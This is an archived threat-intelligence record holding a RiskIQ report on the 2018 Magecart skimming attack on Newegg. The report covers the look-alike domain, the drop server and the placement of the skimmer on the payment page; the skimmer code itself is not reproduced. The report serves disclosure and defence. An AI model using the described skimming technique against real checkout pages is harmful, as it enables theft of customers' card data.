{
	"id": "d04dcc8c-05ae-4c09-85c7-28bfc5b4ae60",
	"created_at": "2026-04-06T00:10:07.207555Z",
	"updated_at": "2026-04-10T03:24:11.827512Z",
	"deleted_at": null,
	"sha1_hash": "3e58e6bdc409d0498c76749dbdc044772063afdb",
	"title": "Another Victim of the Magecart Assault Emerges: Newegg",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 123196,
	"plain_text": "Another Victim of the Magecart Assault Emerges: Newegg\r\nPublished: 2018-09-19 · Archived: 2026-04-05 18:35:58 UTC\r\nSeptember 19, 2018, Yonathan Klijnsma\r\nRiskIQ conducted the research for this report in collaboration with Volexity, which will release a separate report\r\nof its own. From different perspectives, we will discuss the same incident, showing how we found and analyzed the\r\nlatest instance of Magecart using our unique capabilities and datasets.\r\nWhile the dust is settling on the British Airways compromise, the Magecart actor behind it has not stopped their\r\nwork, hitting yet another large merchant: Newegg.\r\nLast week we published details on the British Airways compromise immediately after the company made its first\r\nadvisory public linking the breach of customer credit card information to Magecart. We were able to disclose these\r\ndetails based on our years of tracking the activities and infrastructure of the umbrella of Magecart groups\r\nperforming digital credit card skimming campaigns. The British Airways attack was highly targeted and done via a\r\ntactic we’d seen evolving through the years.\r\nThe report on the British Airways attack came shortly after our discovery that Magecart was also behind the\r\nbreach of Ticketmaster. As we built the narrative, it’s becoming clear to the industry that these simple yet clever\r\nattacks are not only devastating, they’re becoming more and more prevalent. Newegg is just the latest victim.\r\nThe breach of Newegg shows the true extent of Magecart operators’ reach. These attacks are not confined to\r\ncertain geolocations or specific industries—any organization that processes payments online is a target. The\r\nelements of the British Airways attacks were all present in the attack on Newegg: they integrated with the victim’s\r\npayment system and blended with the infrastructure, staying there as long as possible.\r\nAnother Well-Disguised Attack\r\nOn August 13th Magecart operators registered a domain called neweggstats.com with the intent of blending in\r\nwith Newegg’s primary domain, newegg.com.  Registered through Namecheap, the malicious domain initially\r\npointed to a standard parking host. However, the actors changed it to 217.23.4.11 a day later, a Magecart drop\r\nserver where their skimmer backend runs to receive skimmed credit card information. Similar to the British\r\nAirways attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to\r\ntheir page:\r\nhttps://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/\r\nPage 1 of 3\n\nFig-1 Cert used in the attack\r\nSource: https://community.riskiq.com/search/certificate/sha1/df86a5cb482bb884d2bd06d8660b279a446c2d02\r\nAt this point, the server was ready for an attack—an attack against the customers of newegg.com. Around August\r\n14th, the attackers placed the skimmer code on Newegg, managing to integrate it into the checkout process and\r\nachieve their goal of disguising it well.\r\nWhen a customer wants to buy a product they have to go through the following steps:\r\n1. Put a product in their shopping cart\r\n2. Go to the first step of the check-out, entering their delivery information\r\n3. When their address is validated, the customer is taken to the next page: payment processing, where they\r\nenter their credit card information.\r\nThe skimmer was put on the payment processing page itself, not in a script, so it would not show unless the\r\npayment page was hit. Hitting that page means a customer went through the first two steps—they would not be\r\nable to hit the checkout page without putting anything in a cart and entered a validated address.\r\nThe URL for the page that would return the skimmer was:\r\nhttps://secure.newegg.com/GlobalShopping/CheckoutStep2.aspxIntegrating with this process hid the skimmer and\r\nmight help explain how it was on the Newegg website for more than a month.\r\nThe skimmer code is recognizable from the British Airways incident, with the same basecode. All the attackers\r\nhttps://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/\r\nPage 2 of 3\n\nchanged is the name of the form it needs to serialize to obtain payment information and the server to send it to,\r\nthis time themed with Newegg instead of British Airways. In the case of Newegg, the skimmer was smaller\r\nbecause it only had to serialize one form and therefore condensed down to a tidy 15 lines of script:\r\nFig-2 15 lines of script, smaller than the British Airways attack\r\nThe first time the skimmer became active was around August 14th, and we confirmed the skimmer was removed\r\non September 18th, which means the attackers had a full month of skimming Newegg customers. Conveniently\r\nfor the attackers, the skimmer, just like in the British Airways attack, works for both desktop and mobile\r\ncustomers.\r\nWith the size of the business evaluated at $2.65 billion in 2016, Newegg is an extremely popular retailer. Alexa\r\nshows that Newegg has the 161st most popular site in the U.S. and Similarweb, which also gathers information on\r\nsite visits, estimates Newegg receives over 50 million visitors a month. Over an entire month of skimming, we can\r\nassume this attack claimed a massive number of victims.\r\nConclusions\r\nMagecart attacks are surging—RiskIQ’s automatic detections of instances of Magecart breaches pings us almost\r\nhourly. Meanwhile, we’re seeing attackers evolve and improve over time, setting their sights on breaches of large\r\nbrands. While some Magecart groups still target smaller shops, the subgroup responsible for the attacks against\r\nNewegg and British Airways is particularly audacious, performing cunning, highly targeted attacks with skimmers\r\nthat seamlessly integrate into their targets’ websites.\r\nThe attack on Newegg shows that while third parties have been a problem for websites—as in the case of the\r\nTicketmaster breach—self-hosted scripts help attackers move and evolve, in this case changing the actual payment\r\nprocessing pages to place their skimmer.  \r\nWe urge banks to issue new cards or added protection through OTP on cards they can correlate belonging to\r\ntransactions that occurred on Newegg between August 14th and September 18th.\r\nSource: https://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/\r\nhttps://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/"
	],
	"report_names": [
		"magecart-newegg"
	],
	"threat_actors": [
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434207,
	"ts_updated_at": 1775791451,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e58e6bdc409d0498c76749dbdc044772063afdb.pdf",
		"text": "https://archive.orkl.eu/3e58e6bdc409d0498c76749dbdc044772063afdb.txt",
		"img": "https://archive.orkl.eu/3e58e6bdc409d0498c76749dbdc044772063afdb.jpg"
	}
}